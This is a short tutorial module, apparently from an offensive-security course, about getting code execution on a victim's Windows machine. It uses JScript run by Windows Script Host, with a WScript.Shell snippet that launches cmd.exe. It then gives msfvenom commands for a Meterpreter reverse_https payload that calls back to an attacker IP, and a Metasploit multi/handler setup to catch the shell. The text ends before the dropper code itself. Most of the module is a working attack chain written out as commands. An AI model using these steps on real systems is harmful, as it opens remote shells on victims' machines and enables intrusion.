In this module we will learn how to get code execution on victims machine using JavaScript

Execution Of JScript on Windows

First let’s check the default application that windows use to run the JavaScript files

as noticed windows uses Windows Script Host to run JavaScript files

now let’s test what we can do with that

1. we can create an WScript object using ActiveXObject to interact with Windows Script Host
2. Execute commands via the WScript

var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");

Now let’s save and run our file.

As noticed the script executed and opened a new CMD

JScript Meterpreter Dropper

Let’s create a meterpreter payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.16 LPORT=443 EXITFUNC=thread -f exe -o met.exe

now let’s open our multi handler

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > set exitfunc thread
msf6 exploit(multi/handler) > exploit